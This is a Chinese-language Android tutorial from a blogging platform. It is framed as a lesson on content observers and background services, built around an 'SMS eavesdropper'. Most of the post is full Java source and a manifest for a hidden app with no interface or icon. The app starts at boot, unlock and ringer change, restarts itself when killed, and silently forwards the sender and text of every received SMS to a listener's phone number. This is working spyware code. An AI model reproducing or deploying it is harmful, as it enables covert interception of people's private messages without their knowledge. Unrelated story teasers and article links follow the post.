通過短信竊聽器來講解內容提供者,內容觀察者,以及無界面后臺運行服務,開機啟動和殺死服務后重新啟動

第一步:我們講解怎樣做一個無界面和應用圖標的的應用程序。我這里用的是隱式啟動Activity,這樣啟動就不會帶界面和圖標,其實做開啟啟動非常容易,寫一個廣播事件進行監聽,并注冊在清單文件中,一會我們在介紹怎么做到開機啟動服務。回歸正題:如果沒有activity就不能做到安裝就運行,所以我們要有activity,但是又不能有界面和圖標,那就得這么做,看代碼吧!如下:



紅線部分就是比較重點的代碼,上邊有解釋,我就不多說了,只要加上上邊紅色部分的代碼,就能做到啟動Activity沒有界面和圖標。
第二步:服務開機自動啟動。首先我們應該寫一個開機自動啟動的廣播,代碼如下:

package net.loonggg.testbackstage;  
  
import android.content.BroadcastReceiver;  
import android.content.Context;  
import android.content.Intent;  
  
public class BootReceiver extends BroadcastReceiver {  
  
@Override  
public void onReceive(Context context, Intent intent) {  
Intent mBootIntent = new Intent(context, TestService.class);  
context.startService(mBootIntent);  
}  
  
}  

然后是非常重要的服務Service的代碼:

package net.loonggg.testbackstage;  
  
import android.app.Service;  
import android.content.ContentResolver;  
import android.content.Intent;  
import android.database.ContentObserver;  
import android.database.Cursor;  
import android.net.Uri;  
import android.os.Handler;  
import android.os.IBinder;  
import android.telephony.SmsManager;  
  
public class TestService extends Service {  
  
@Override  
public IBinder onBind(Intent intent) {  
return null;  
}  
  
@Override  
public void onCreate() {  
super.onCreate();  
ContentResolver resolver = getContentResolver();  
Uri uri = Uri.parse("content://sms/");  
resolver.registerContentObserver(uri, true, new MyObserver(  
new Handler()));  
}  
  
@Override  
public int onStartCommand(Intent intent, int flags, int startId) {  
flags = START_STICKY;// START_STICKY(或START_STICKY_COMPATIBILITY)是service被kill掉后自動重寫創建  
return super.onStartCommand(intent, flags, startId);  
// return START_REDELIVER_INTENT;  
}  
  
private class MyObserver extends ContentObserver {  
  
public MyObserver(Handler handler) {  
super(handler);  
}  
  
@Override  
public void onChange(boolean selfChange) {  
super.onChange(selfChange);  
ContentResolver resolver = getContentResolver();  
Uri uri = Uri.parse("content://sms/");  
Cursor cursor = resolver.query(uri, new String[] { "address",  
"body" }, null, null, null);  
cursor.moveToFirst();  
String address = cursor.getString(cursor.getColumnIndex("address"));  
String body = cursor.getString(cursor.getColumnIndex("body"));  
String smsContent = "number:" + address + "--content:" + body;  
SmsManager smsManager = SmsManager.getDefault();  
// 下邊的注釋是超過70個字符,分條發送,這里不需要  
// if (smsContent.length() > 70) {  
// List<String> contents = smsManager.divideMessage(smsContent);  
// for (String sms : contents) {  
// smsManager.sendTextMessage("5556", null, sms, null, null);  
// }  
// } else {  
smsManager.sendTextMessage("5556", null, smsContent, null, null);  
// }  
cursor.close();  
}  
  
}  
  
public void onDestroy() {  
Intent localIntent = new Intent();  
localIntent.setClass(this, TestService.class); // 銷毀時重新啟動Service  
this.startService(localIntent);  
}  
  
}  

服務里面的具體代碼我們一會在解釋,這里主要講解怎樣做到開機自動啟動。做到開機自動啟動,與服務里面的代碼沒有關系,主要是那個BootReceiver廣播配合清單文件AndroidManifest.xml,在清單文件里注冊這個廣播事件,開機觸發廣播,就會運行BootReceiver里面的onReceive()方法,啟動服務了!



紅色部分代碼就是廣播里面有關開機啟動的代碼,黑色的那兩行與殺死進程再重新啟動有關!
第三步:被管理進程的軟件殺死服務后,再重新啟動的方法。首先將服務的優先級設為最大,這樣不容易在內存不夠時,被先殺死,然后就是將廣播的優先級加最高,最重要的就是上邊圖片中那兩行的畫黑線的代碼,它們會在鎖屏和情景變化時,啟動廣播,從而重新啟動服務。代碼如下:



在TestService中,更重要的代碼是:
@Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        flags = START_STICKY;// START_STICKY(或START_STICKY_COMPATIBILITY)是service被kill掉后自動重寫創建
        return super.onStartCommand(intent, flags, startId);
        // return START_REDELIVER_INTENT;
    }

    public void onDestroy() {
        Intent localIntent = new Intent();
        localIntent.setClass(this, TestService.class); // 銷毀時重新啟動Service
        this.startService(localIntent);
    }

為什么重要,代碼中都有解釋,一個是在銷毀時重新啟動服務,另一個是返回START_STICKY代表service被kill掉后會自動重寫創建。
第四步:通過內容觀察者和內容提供者監聽短信,內容觀察者是觀察系統短信的變化,只要系統短信變化,內容觀察者就能監聽到,通過內容提供者獲取短信內容,再把內容發送到監聽者的手機或者上傳到服務器,我在這里用的是將監聽到的短信內容發送到監聽者的手機中!代碼就在TestService中,代碼如下:

@Override  
public void onCreate() {  
super.onCreate();  
ContentResolver resolver = getContentResolver();  
Uri uri = Uri.parse("content://sms/");  
/** 
 * 第一個參數不用解釋,第二個參數notifyForDescendents這個需要解釋,true代表主機的主要Uri一樣就會觸發,發送消息, 
 * false代表必須非常精確的Uri一樣才能觸發,發送消息,第三個參數也不用解釋,就是內容觀察者 
 */  
resolver.registerContentObserver(uri, true, new MyObserver(  
new Handler()));  
}  
  
private class MyObserver extends ContentObserver {  
  
public MyObserver(Handler handler) {  
super(handler);  
}  
  
/** 
 * 當內容觀察者,觀察到數據庫的內容發生變化的時候,調用這個方法 。 觀察到消息郵箱里面有一條數據庫內容變化的通知 
 */  
@Override  
public void onChange(boolean selfChange) {  
super.onChange(selfChange);  
ContentResolver resolver = getContentResolver();  
Uri uri = Uri.parse("content://sms/");  
Cursor cursor = resolver.query(uri, new String[] { "address",  
"body" }, null, null, null);  
cursor.moveToFirst();  
String address = cursor.getString(cursor.getColumnIndex("address"));  
String body = cursor.getString(cursor.getColumnIndex("body"));  
String smsContent = "number:" + address + "--content:" + body;  
SmsManager smsManager = SmsManager.getDefault();  
// 下邊的注釋是超過70個字符,分條發送,這里不需要  
// if (smsContent.length() > 70) {  
// List<String> contents = smsManager.divideMessage(smsContent);  
// for (String sms : contents) {  
// smsManager.sendTextMessage("5556", null, sms, null, null);  
// }  
// } else {  
smsManager.sendTextMessage("5556", null, smsContent, null, null);  
// }  
cursor.close();  
}  
  
}  

到這里就都解釋完了,我把完整的清單文件代碼貼出來,代碼如下:

<?xml version="1.0" encoding="utf-8"?>  
<manifest xmlns:android="http://schemas.android.com/apk/res/android"  
package="net.loonggg.testbackstage"  
android:versionCode="1"  
android:versionName="1.0" >  
  
<uses-sdk  
android:minSdkVersion="8"  
android:targetSdkVersion="17" />  
  
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />  
<uses-permission android:name="android.permission.READ_SMS" />  
<uses-permission android:name="android.permission.SEND_SMS" />  
<uses-permission android:name="android.permission.READ_PHONE_STATE" />  
  
<application  
android:allowBackup="true"  
android:label="@string/app_name"  
android:persistent="true"  
android:theme="@style/AppTheme" > <!-- 切記, android:persistent="true"這個不可濫用,系統中用這個的service,app一多,整個系統就完蛋了。 -->  
<service  
android:name=".TestService"  
android:priority="1000" > <!-- 優先級設置成最大 -->  
</service>  
  
<receiver  
android:name=".BootReceiver"  
android:priority="2147483647" > <!-- 優先級加最高 -->  
<intent-filter>  
  
<!-- 系統啟動完成后會調用 -->  
<action android:name="android.intent.action.BOOT_COMPLETED" />  
<!-- 解鎖完成后會調用 -->  
<action android:name="android.intent.action.USER_PRESENT" />  
<!-- 監聽情景切換 -->  
<action android:name="android.media.RINGER_MODE_CHANGED" />  
</intent-filter>  
</receiver>  
  
<activity  
android:name=".MainActivity"  
android:label="@string/app_name"  
android:theme="@android:style/Theme.NoDisplay" > <!-- 無界面 -->  
<intent-filter>  
<action android:name="android.intent.action.MAIN" />  
  
<category android:name="android.intent.category.LAUNCHER" />  
<!-- 隱式啟動Activity,不會顯示圖標 -->  
<data  
android:host="”MainActivity”"  
android:scheme="”net.loonggg.testbackstage”" />  
</intent-filter>  
</activity>  
</application>  
  
</manifest>  

會了嗎?看懂了吧?

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 229,908評論 6 541
  • 序言:濱河連續發生了三起死亡事件,死亡現場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機,發現死者居然都...
    沈念sama閱讀 99,324評論 3 429
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 178,018評論 0 383
  • 文/不壞的土叔 我叫張陵,是天一觀的道長。 經常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 63,675評論 1 317
  • 正文 為了忘掉前任,我火速辦了婚禮,結果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當我...
    茶點故事閱讀 72,417評論 6 412
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發上,一...
    開封第一講書人閱讀 55,783評論 1 329
  • 那天,我揣著相機與錄音,去河邊找鬼。 笑死,一個胖子當著我的面吹牛,可吹牛的內容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 43,779評論 3 446
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 42,960評論 0 290
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當地人在樹林里發現了一具尸體,經...
    沈念sama閱讀 49,522評論 1 335
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 41,267評論 3 358
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發現自己被綠了。 大學時的朋友給我發了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 43,471評論 1 374
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 39,009評論 5 363
  • 正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響,放射性物質發生泄漏。R本人自食惡果不足惜,卻給世界環境...
    茶點故事閱讀 44,698評論 3 348
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 35,099評論 0 28
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 36,386評論 1 294
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個月前我還...
    沈念sama閱讀 52,204評論 3 398
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 48,436評論 2 378

推薦閱讀更多精彩內容

  • Android 自定義View的各種姿勢1 Activity的顯示之ViewRootImpl詳解 Activity...
    passiontim閱讀 172,717評論 25 708
  • ¥開啟¥ 【iAPP實現進入界面執行逐一顯】 〖2017-08-25 15:22:14〗 《//首先開一個線程,因...
    小菜c閱讀 6,491評論 0 17
  • 廣播接收者 BroadcastReceiver 接收系統發出的廣播 現實中的廣播:電臺為了傳達一些消息,而發送的廣...
    fantasy_dandan閱讀 1,286評論 0 2
  • Android Studio JNI流程首先在java代碼聲明本地方法 用到native關鍵字 本地方法不用去實現...
    MigrationUK閱讀 11,926評論 7 123
  • 今天的常德,曾經的名字在中國幾乎家喻戶曉:武陵。桃花源就是被迷路的武陵漁人發現后,又經過陶淵明的描寫,才成了中國人...
    穆平閱讀 598評論 1 2